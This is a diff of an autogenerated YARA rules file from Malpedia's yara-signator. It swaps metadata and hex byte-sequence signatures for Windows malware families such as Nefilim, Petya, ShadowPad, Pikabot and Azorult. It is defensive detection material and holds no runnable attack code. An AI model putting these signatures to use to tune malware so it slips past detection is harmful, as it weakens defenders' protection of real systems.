-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nefilim_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nemty_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "437ef32e0bcb845260c527798fe2225eeb3cd5a3921b5194205f4e5468ee3dde"
+		logic_hash = "f4748253b478a30babc01e1a18cefa28bd614751ff42e5c92d122e8c6c1d7fc7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91771,32 +92105,32 @@ rule MALPEDIA_Win_Nefilim_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 c745f4e8a14000 e8???????? cc 8bff 55 8bec }
-		$sequence_1 = { e9???????? 8975e4 33c0 39b8c8e74000 0f8491000000 ff45e4 }
-		$sequence_2 = { ff75ec 68???????? 56 56 }
-		$sequence_3 = { 56 56 895dc0 ff15???????? 56 }
-		$sequence_4 = { ff15???????? 8144242890d00300 8b44241c 115c242c 3944242c 0f8c3dffffff 0f8f5d010000 }
-		$sequence_5 = { 85c0 7434 68???????? 8d8424d0000000 }
-		$sequence_6 = { ffd6 85c0 0f84cc030000 68???????? 8d8424d0000000 }
-		$sequence_7 = { 6a01 8d74246c e8???????? 83ec1c 8bcc 217910 33c0 }
-		$sequence_8 = { 8b442418 8b4c241c 53 03c6 53 13cb }
-		$sequence_9 = { 2bc8 83f901 770a 68???????? e8???????? 8d5801 6a00 }
+		$sequence_0 = { 6bf61c 8b45e8 03f0 897308 6bff1c }
+		$sequence_1 = { 53 50 89b5e4d8ffff 889decd8ffff e8???????? 83c40c 8d85e8d8ffff }
+		$sequence_2 = { 8d45c4 bf???????? e8???????? 6a01 }
+		$sequence_3 = { 8d4d0c 837d2010 56 8d3401 8b450c 57 7303 }
+		$sequence_4 = { e8???????? 53 8db570ffffff e8???????? 53 }
+		$sequence_5 = { 7302 8bc7 3bc6 740f }
+		$sequence_6 = { c785e0d8ffff10270000 ff15???????? 837d1c10 8b4508 }
+		$sequence_7 = { 50 ff35???????? ff75a4 56 ff15???????? 56 }
+		$sequence_8 = { 8a07 3a4508 7513 6a01 8d4508 }
+		$sequence_9 = { 68???????? 8d8424a8000000 e8???????? 6a07 5f 33c0 83ec1c }
 
 	condition:
-		7 of them and filesize < 142336
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Silentgh0St_Auto : FILE
+rule MALPEDIA_Win_Glassrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4a960624-dc10-5985-85b4-1cf5514d3775"
+		id = "42f75008-33b0-5628-aa20-35cf904b2cc2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silentgh0st"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silentgh0st_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.glassrat_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a3ef882d6032b75964ce0bbd68389a460d9ac4c6db1e56db70620c83eabc0109"
+		logic_hash = "4ee9c1e6fb6f5290f1ce6d0e335f981f784c2b61e1aa9e3c4c33ebb2644983ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91810,32 +92144,32 @@ rule MALPEDIA_Win_Silentgh0St_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1f905 8b0c8d00c40e10 83e01f c1e006 8d440124 8b4d10 8a10 }
-		$sequence_1 = { c3 b808000000 e8???????? 8b4c2418 33c0 85c9 0f8ee6000000 }
-		$sequence_2 = { 3bc7 7432 ff7308 50 e8???????? ff33 e8???????? }
-		$sequence_3 = { a801 752a 8b5500 57 52 e8???????? 83c408 }
-		$sequence_4 = { 8bc6 c1f805 8bfe 53 8d1c8500c40e10 8b03 83e71f }
-		$sequence_5 = { e8???????? 83c408 85c0 0f8431020000 8b4c2440 8b06 8b9084000000 }
-		$sequence_6 = { 8d6f03 8d4e01 895c2420 c744242404000000 8d642400 8b5c2428 0fb61c03 }
-		$sequence_7 = { c3 55 8bec 833d????????00 7505 e8???????? 33c9 }
-		$sequence_8 = { 83c410 833d????????00 750a c705????????18f60c10 68cc000000 68???????? 6a02 }
-		$sequence_9 = { 7ccc 8b5c2408 85db 7409 56 57 6a03 }
+		$sequence_0 = { 56 53 8bf1 53 6a01 }
+		$sequence_1 = { 50 e8???????? 84c0 754b 6860ea0000 ff15???????? 8d8c242c010000 }
+		$sequence_2 = { f3a4 741a 6a02 50 ff15???????? 8b4d04 51 }
+		$sequence_3 = { 33c0 8b5504 8944241d 8d4c241c 89442421 c644241c00 89442425 }
+		$sequence_4 = { 84c0 7404 b001 eb1e }
+		$sequence_5 = { 50 51 ffd3 85c0 7e0a 2bf0 03f8 }
+		$sequence_6 = { 76cd b900080000 33c0 8dbdd8dfffff f3ab }
+		$sequence_7 = { ff15???????? 8b4e34 6a00 51 ffd7 8b4618 }
+		$sequence_8 = { f3a5 8bc8 33c0 83e103 c745fc00000000 f3a4 }
+		$sequence_9 = { 6a00 ff15???????? a1???????? 8b15???????? 8b0d???????? 89442408 }
 
 	condition:
-		7 of them and filesize < 2065408
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Pkybot_Auto : FILE
+rule MALPEDIA_Win_Petya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9566564a-6687-550f-9183-0e62d1076054"
+		id = "96d15d70-0cad-5ba8-b732-d7e2c6c8a3c4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pkybot_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.petya_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "a42386b2108c9d1af3a399f3ab6d599f676b5aeb865fae8577e3f6311e115c33"
+		logic_hash = "126f559636a52e8bbed5a94164c0b2da83f722a29115c2b51cd7bbb82a77ed47"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91849,32 +92183,32 @@ rule MALPEDIA_Win_Pkybot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 8d45fc 50 56 ff7510 ff750c }
-		$sequence_1 = { 85c0 7510 8b4e04 21413c c741300c000000 897938 5f }
-		$sequence_2 = { 894604 e8???????? 6a04 50 }
-		$sequence_3 = { 56 ff7518 57 ff15???????? 56 ff7514 ff7510 }
-		$sequence_4 = { 84c0 750e 8b7624 85f6 }
-		$sequence_5 = { ff15???????? 8bf0 ff15???????? 85c0 7509 85f6 }
-		$sequence_6 = { e8???????? 8d8e90000000 e8???????? 8d4e44 e8???????? 8bce }
-		$sequence_7 = { ff15???????? 8b45f0 0b45f4 741b 8b45f8 0b45fc }
-		$sequence_8 = { 7512 ff15???????? a3???????? 03c0 }
-		$sequence_9 = { ff7510 ff750c 57 ff7508 e8???????? 57 8bd8 }
+		$sequence_0 = { 03c7 53 50 e8???????? 83c40c 8d5750 }
+		$sequence_1 = { 75f5 46 3bf2 53 0f42f2 6a04 56 }
+		$sequence_2 = { 0f42f2 6a04 56 e8???????? 8bd8 }
+		$sequence_3 = { 8b4c2420 33fe 8bf0 33da 0facc80e 33d2 c1e612 }
+		$sequence_4 = { a1???????? 85c0 743a 53 56 8b35???????? 33c9 }
+		$sequence_5 = { c1e017 33ff 0bf9 c1eb09 8b4c2424 }
+		$sequence_6 = { c1eb09 0bd8 8b44241c 8bf0 0facc812 c1e60e }
+		$sequence_7 = { 8bf8 85f6 7505 e8???????? 8bc7 5f }
+		$sequence_8 = { 33d2 0facc812 0bd0 c1e912 0bf1 }
+		$sequence_9 = { 6a00 50 e8???????? ff7618 8d857cfeffff }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Merdoor_Auto : FILE
+rule MALPEDIA_Win_Virdetdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef7053a5-476a-59b5-8ddd-5293675500e6"
+		id = "6e6bed26-b841-5f32-a122-ab8bbf6a241f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.merdoor_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virdetdoor_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "33a0b0b418ee0e7fb6e555149df68449fe325aead89e3fe3bc9a1904f1b68daf"
+		logic_hash = "1295e76b0307a288c9ca8e40bd8de47b87983bee24b0a3d67ad5ac1b80c8e6e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91888,32 +92222,32 @@ rule MALPEDIA_Win_Merdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45d4 53 0f4345d4 6a01 }
-		$sequence_1 = { 8bd9 83ff40 7308 5f 33c0 5b 5d }
-		$sequence_2 = { 85c0 742e 8d7808 b9a8000000 be???????? f3a5 e8???????? }
-		$sequence_3 = { 83c40c 8934fd78f30110 eb07 56 e8???????? 59 c745fcfeffffff }
-		$sequence_4 = { 8d8594feffff 50 57 6a00 ff9578fdffff 8bd8 85db }
-		$sequence_5 = { 8b4de0 85c9 7449 8b45e8 894dd0 8d4de0 51 }
-		$sequence_6 = { 8981b0020000 ff75e0 ff15???????? 8b45f8 5f 5e 5b }
-		$sequence_7 = { 0fb7c0 eb0b 8b8d78ffffff 83c102 03c1 50 57 }
-		$sequence_8 = { 64a300000000 8bf9 897da8 8b8f50040000 85c9 7405 8b01 }
-		$sequence_9 = { b010 2ac1 f6d0 fec1 3084156cfcffff 42 80f910 }
+		$sequence_0 = { 57 6a3d 33db 5f ff7508 8d041f 99 }
+		$sequence_1 = { 8bd7 53 8bce 8903 e8???????? 83c40c }
+		$sequence_2 = { e8???????? 668b45ec 8b55f8 59 }
+		$sequence_3 = { 83ee01 753e 85ff 7524 390b 7720 }
+		$sequence_4 = { e8???????? ebe3 46 897508 3bb3b0020000 0f8cc1feffff eb13 }
+		$sequence_5 = { 7514 81f980000000 720c 85d2 }
+		$sequence_6 = { 83feff 7424 6a00 6800100000 33d2 8bce }
+		$sequence_7 = { c7063e000000 e9???????? c70643000000 e9???????? 803c073a }
+		$sequence_8 = { 83f83a 0f87ce010000 ff24859e414000 c60102 e9???????? c60101 }
+		$sequence_9 = { 7524 390b 7720 3903 }
 
 	condition:
-		7 of them and filesize < 307200
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Sedll_Auto : FILE
+rule MALPEDIA_Win_Phandoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ecd5bad1-bc54-5597-9a03-6b9de2dff623"
+		id = "0e2d27b4-00ed-575d-8906-80ec3438892e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sedll_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phandoor_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "fc4557f56af955238bdd97487f20282917cc4ee0a9fe525b8866f2a10d37bfda"
+		logic_hash = "672e69f8a19e82fd9345f6016aa6bea0d13d3c04e81e3fb7b10e21c796057271"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91927,32 +92261,38 @@ rule MALPEDIA_Win_Sedll_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d c20c00 8b4510 33d2 51 8910 }
-		$sequence_1 = { 8d4590 50 6a00 56 }
-		$sequence_2 = { ff75fc ff15???????? 85f6 7508 }
-		$sequence_3 = { 53 668945f8 a1???????? 660fd645f0 56 8bf1 }
-		$sequence_4 = { 83fb03 7d8b 8b55fc 2bd7 7463 0fb60f }
-		$sequence_5 = { 8b5d14 8bcb 57 e8???????? 8bf8 85ff }
-		$sequence_6 = { 8d857cfeffff 8955f0 6a00 50 }
-		$sequence_7 = { 8bf1 85c0 740a 50 }
-		$sequence_8 = { e8???????? 83c40c 33ff 85db 0f8eca000000 8b45fc 8a0407 }
-		$sequence_9 = { a1???????? 50 8b08 ff5104 33c0 5e 8be5 }
+		$sequence_0 = { 833d????????00 0f84ea000000 833d????????00 0f84dd000000 833d????????00 0f84d0000000 }
+		$sequence_1 = { 57 750c 8b36 e8???????? 83c404 eb25 }
+		$sequence_2 = { 50 ffd3 8bf8 85ff 0f84c6010000 }
+		$sequence_3 = { b9???????? 8975fc 8975f8 8975f4 8975f0 }
+		$sequence_4 = { e8???????? 83c404 8d55fc 8bf0 52 56 }
+		$sequence_5 = { 833d????????00 0f8404010000 833d????????00 0f84f7000000 }
+		$sequence_6 = { 8bd9 c1ea08 c1eb10 22da }
+		$sequence_7 = { 0fb6843e94010000 50 b9???????? e8???????? 50 53 e8???????? }
+		$sequence_8 = { 85c0 7502 5f c3 8a08 84c9 }
+		$sequence_9 = { 83c624 833e00 75ea 85c0 }
+		$sequence_10 = { 83c002 89b5e0eeffff 33c9 8975fc }
+		$sequence_11 = { 83c604 81fe???????? 7ceb 5f b801000000 }
+		$sequence_12 = { 43 84c0 7409 8803 }
+		$sequence_13 = { 3acb 740e 50 ffd6 8a08 84c9 }
+		$sequence_14 = { 83c604 e8???????? 57 8bf0 }
+		$sequence_15 = { 56 8b7308 85f6 7420 57 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 2124800
 }
-rule MALPEDIA_Win_Shadowpad_Auto : FILE
+rule MALPEDIA_Win_Farseer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c39d05c-4c59-5f9b-9da5-72e531a1a600"
+		id = "5a67d1eb-3f83-53bd-8009-08fd90d91a72"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shadowpad_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.farseer_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "a48ed110f457b6e73e53b15a8712b4e6c99fbab0e15de593c3c355b2a563bc5f"
+		logic_hash = "c4f58eaf1a171a6ef6927bdc0d75281407b1ff19c17d7d3cb4db395f2514c097"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91966,33 +92306,33 @@ rule MALPEDIA_Win_Shadowpad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 8d75dc a3???????? e8???????? 53 ff15???????? }
-		$sequence_1 = { e8???????? 5e c3 8d4648 e8???????? 830eff }
-		$sequence_2 = { 50 6801000080 ffd3 8d442430 50 ff15???????? 393d???????? }
-		$sequence_3 = { 0430 8845f8 8d45f8 50 }
-		$sequence_4 = { 33c0 57 33ff 8945e0 894de4 897dec 894de8 }
-		$sequence_5 = { 803c0700 7403 47 ebba 8b4d08 33c0 }
-		$sequence_6 = { c20400 55 8bec 53 57 ff7508 ff15???????? }
-		$sequence_7 = { 50 e8???????? 85c0 7594 8d45c0 }
-		$sequence_8 = { 50 ffd6 83f820 7e0a 53 8d8590efffff 50 }
-		$sequence_9 = { 0fb639 c1ce08 83cf20 03f7 83c102 81f6a3d9357c 663919 }
+		$sequence_0 = { 83f804 770c 6a06 68???????? e9???????? 83f805 0f8590000000 }
+		$sequence_1 = { 8b4514 40 c745eceab84000 894df8 8945fc 64a100000000 8945e8 }
+		$sequence_2 = { 399c24e0000000 7307 8d8424cc000000 50 8d4c2444 e8???????? 85c0 }
+		$sequence_3 = { c1e106 030cbd20634200 eb02 8bca }
+		$sequence_4 = { c1e006 03049520634200 eb05 b8???????? f6400420 7414 }
+		$sequence_5 = { ffd5 85c0 7e2f 03f0 81fe00040000 7ce1 33c0 }
+		$sequence_6 = { 50 8d0c3e 51 53 }
+		$sequence_7 = { 85c0 757a 8b5c2424 8d751c 3bf3 }
+		$sequence_8 = { 895604 894608 8d842458020000 8d5001 8d4900 8a08 }
+		$sequence_9 = { 3bc1 0f87ad090000 ff24851d094100 838de8fdffffff 89b590fdffff }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 347328
 }
-rule MALPEDIA_Win_Dexter_Auto : FILE
+rule MALPEDIA_Win_Bhunt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d3d372c-0686-511d-bba6-815685b0b441"
+		id = "29e82532-7a8f-57df-9bb4-9a79fe2adcb0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dexter_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bhunt_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "537f3a05b932c01193b62b9eef1199d3fcfbbcfba0cd35a2f7ef69253c025c83"
-		score = 75
+		logic_hash = "a7325d2f342b2d438ae4157b93fee930a25dcbfe35ec458ac01a26d195b6e98d"
+		score = 50
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -92005,32 +92345,32 @@ rule MALPEDIA_Win_Dexter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b801000000 eb0d 8b4dfc 83c101 894dfc ebc8 33c0 }
-		$sequence_1 = { 68???????? 68???????? e8???????? 83c40c 68???????? a1???????? 50 }
-		$sequence_2 = { e8???????? 83c410 8b4508 50 8b4d10 }
-		$sequence_3 = { ff15???????? e9???????? 6a59 ff15???????? 85c0 7514 }
-		$sequence_4 = { ff15???????? 50 8b45fc 50 68???????? }
-		$sequence_5 = { 6a00 6a00 68???????? ff15???????? 6a02 }
-		$sequence_6 = { 52 e8???????? 83c404 0fbec0 83e857 }
-		$sequence_7 = { 6a06 8b15???????? 52 ff15???????? a3???????? c705????????00000000 6a01 }
-		$sequence_8 = { 85c0 7414 68???????? 8b4d08 51 }
-		$sequence_9 = { a3???????? 833d????????00 0f85bc000000 e8???????? a3???????? 6808020000 }
+		$sequence_0 = { 8d4510 50 8d75e0 895d10 e8???????? 8b4508 40 }
+		$sequence_1 = { 81c19a343e57 f5 c1c903 3be2 f7c43b003f6a 85cd 0fc9 }
+		$sequence_2 = { f8 33c3 48 c1c003 80fb62 2d89703a21 f7c6fc739c51 }
+		$sequence_3 = { 0bee 236c2414 23fe 0bef 036c2450 895c241c }
+		$sequence_4 = { 8b5604 f9 f7d1 f5 f7c727065338 6685eb f7d2 }
+		$sequence_5 = { 8bc1 c1f805 8bf1 8d3c8500e04900 8b07 83e61f c1e606 }
+		$sequence_6 = { 8bd3 0fbcc2 c1e202 80eca7 8bc5 f5 663bd7 }
+		$sequence_7 = { ff7304 8b45fc ff30 8d7be4 e8???????? 59 59 }
+		$sequence_8 = { ff5070 8bb7a4060000 68???????? e8???????? 83f8ff 7543 391d???????? }
+		$sequence_9 = { c1e21c 33db c1ef04 0bd8 8b04cd68fa4400 0bd7 8bfa }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 19161088
 }
-rule MALPEDIA_Win_Bagle_Auto : FILE
+rule MALPEDIA_Win_Cookiebag_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1b117c6-ef70-5a17-abcf-06072ab81225"
+		id = "ac3bf6d4-71cf-5c5b-be8e-0bd3c3ef57c9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bagle_auto.yar#L1-L102"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cookiebag_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "78371b093ac9a1cbad80f2768798d5c43910e03f8eb339710028eb9343ade350"
+		logic_hash = "679ac50c0d3fc2601e0f2f772686754e8efa393c4c8cfd8d8fb7af71ce9952bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92044,32 +92384,34 @@ rule MALPEDIA_Win_Bagle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a02 6a00 ff75fc e8???????? 0bc0 }
-		$sequence_1 = { 75e2 c3 55 8bec 56 8b4508 }
-		$sequence_2 = { 6a02 e8???????? 8bd8 ff7508 e8???????? 83fbff }
-		$sequence_3 = { 5e c9 c20c00 c1c206 8bc2 243f }
-		$sequence_4 = { 8b4d10 33db e340 ac }
-		$sequence_5 = { 6a00 6a00 6a00 ff7508 e8???????? 6a00 }
-		$sequence_6 = { 79c6 f7d9 2bf9 b03d }
-		$sequence_7 = { 6880000000 68???????? e8???????? 6a00 6a00 6a00 68???????? }
+		$sequence_0 = { 8d4c242c 52 55 50 c68424c000000011 }
+		$sequence_1 = { 83c9ff f2ae 8b456c f7d1 49 51 }
+		$sequence_2 = { 8d4c241c e8???????? 8b442418 c68424a80000000d 3bc3 895c2448 7505 }
+		$sequence_3 = { c7430857000000 6a01 8d8c2480000000 c7842404010000ffffffff e8???????? }
+		$sequence_4 = { 8b4c2450 897c2440 3bcf 897c2444 897c2448 741c }
+		$sequence_5 = { 8d4c243c c684248401000005 e8???????? 8b4c241c 33f6 3bce }
+		$sequence_6 = { 8b6c2408 56 8bf1 57 8a08 55 880e }
+		$sequence_7 = { 6a01 8d4c2460 c68424ac00000002 e8???????? 8b4c2450 3bcb 741c }
+		$sequence_8 = { 55 8bce e8???????? 89aedc000000 8b86e4000000 33ff }
+		$sequence_9 = { eb0c 83c1fe 51 e8???????? 83c404 895e40 895e44 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 311296
 }
-rule MALPEDIA_Win_Lumar_Auto : FILE
+rule MALPEDIA_Win_Pikabot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f6eed55-2de5-5fd1-92bb-28b323fbad6c"
+		id = "ca491d89-20a6-5b52-8d28-6fe7d217ba54"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lumar_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pikabot_auto.yar#L1-L270"
 		license_url = "N/A"
-		logic_hash = "4c7ebe5b3b93aaa9cf6694e15922d9cba2c0b75a9c7cd0df2741c632bee6f36c"
+		logic_hash = "c58243245af92019919e67e8e639db22bdc3515d5ca76925cfc701e773724623"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -92081,32 +92423,51 @@ rule MALPEDIA_Win_Lumar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b55f8 8b4df0 56 e8???????? 83c418 8bce e8???????? }
-		$sequence_1 = { 8b450c 48 89450c 8b45f4 3b45b8 730f 8b45f8 }
-		$sequence_2 = { 8a06 3ac3 7de6 8a06 6a03 5b 3c6c }
-		$sequence_3 = { 83e801 740b 2bc3 742d 83620c00 4e }
-		$sequence_4 = { 7618 8b848d74fbffff 89948d74fbffff 03d0 41 3bce }
-		$sequence_5 = { 8d8534ffffff 59 0fb70d???????? 0f45d1 0fb7ca 41 }
-		$sequence_6 = { 8bec b804100000 e8???????? 53 56 57 bb00100000 }
-		$sequence_7 = { e8???????? 83c40c 8945f0 8365e400 8b45b0 83e001 }
-		$sequence_8 = { 83fa02 73e1 5e c3 55 8bec }
-		$sequence_9 = { c60430c3 8d45fc 895dfc 50 ff15???????? 50 ff15???????? }
+		$sequence_0 = { ebd3 8b4508 c9 c3 55 8bec }
+		$sequence_1 = { 8bec 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 }
+		$sequence_2 = { 8b45f8 40 8945f8 ebd3 8b4508 }
+		$sequence_3 = { 8b4df8 8a09 8808 8b45fc 40 8945fc 8b45f8 }
+		$sequence_4 = { 8b4510 48 894510 837df400 741a 8b45fc 8b4df8 }
+		$sequence_5 = { 7ce9 8b4214 2b420c 5f }
+		$sequence_6 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 0fb6c3 }
+		$sequence_7 = { 3bc7 72d5 5b 5f 8bc6 }
+		$sequence_8 = { 57 8bfa 85c9 7436 85ff }
+		$sequence_9 = { 6a08 0f43c8 33c1 83fa40 }
+		$sequence_10 = { 8801 41 8a040a 84c0 75f6 c60100 8bc6 }
+		$sequence_11 = { 8b0cba 03ce e8???????? 8bd0 }
+		$sequence_12 = { 53 56 8b35???????? b84d5a0000 57 8955fc 663906 }
+		$sequence_13 = { e8???????? 8bd0 e8???????? 3b45fc }
+		$sequence_14 = { 0fabd0 83fa20 6a08 0f43c8 }
+		$sequence_15 = { 56 8bf1 85c9 7419 85d2 }
+		$sequence_16 = { 0345f8 03c8 0fb6c9 894df8 }
+		$sequence_17 = { 0fb6d1 03c2 0fb6c0 8945f0 }
+		$sequence_18 = { 40 3d00010000 72f1 8bf2 }
+		$sequence_19 = { 81f900010000 72f0 8bf0 33d2 }
+		$sequence_20 = { 3d00010000 72f1 8b35???????? 8bf9 }
+		$sequence_21 = { 8b01 0d20202020 3d6e74646c 750f }
+		$sequence_22 = { 8d4400ff 5d c3 55 89e5 57 56 }
+		$sequence_23 = { 893c24 e8???????? 31c9 894c2410 }
+		$sequence_24 = { a1???????? 8b00 890424 e8???????? a1???????? 8b9060010000 89542404 }
+		$sequence_25 = { 890424 e8???????? 8b4308 29f0 }
+		$sequence_26 = { c744240448020000 c7042440000000 a1???????? ff5050 31c9 52 }
+		$sequence_27 = { 893c24 a1???????? ff90ec000000 52 52 85c0 }
+		$sequence_28 = { 89442408 31c0 89442404 890424 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 1717248
 }
-rule MALPEDIA_Win_Doublefinger_Auto : FILE
+rule MALPEDIA_Win_Azorult_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf642cb4-badb-524a-b631-15e39cc2daf5"
+		id = "78ceafa4-342d-5f15-9b14-b1abd4927873"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefinger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublefinger_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.azorult_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "3eae491d263429c9200953e488faaa30692919588c48a865c32492ea2fca792f"
+		logic_hash = "41a9a9a645aa649d01575fa1735f856598b52bd5cebd3453810c05cbd7a89f47"
 		score = 75
 		quality = 75
 		tags = "FILE"
